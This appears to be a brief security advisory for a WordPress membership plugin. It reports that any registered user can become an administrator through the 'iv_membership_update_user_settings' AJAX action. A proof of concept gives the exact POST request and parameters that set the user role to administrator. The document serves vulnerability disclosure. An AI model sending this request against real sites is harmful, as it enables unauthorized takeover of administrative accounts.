Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website.

2 Proof of Concept

* Login as regular user* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`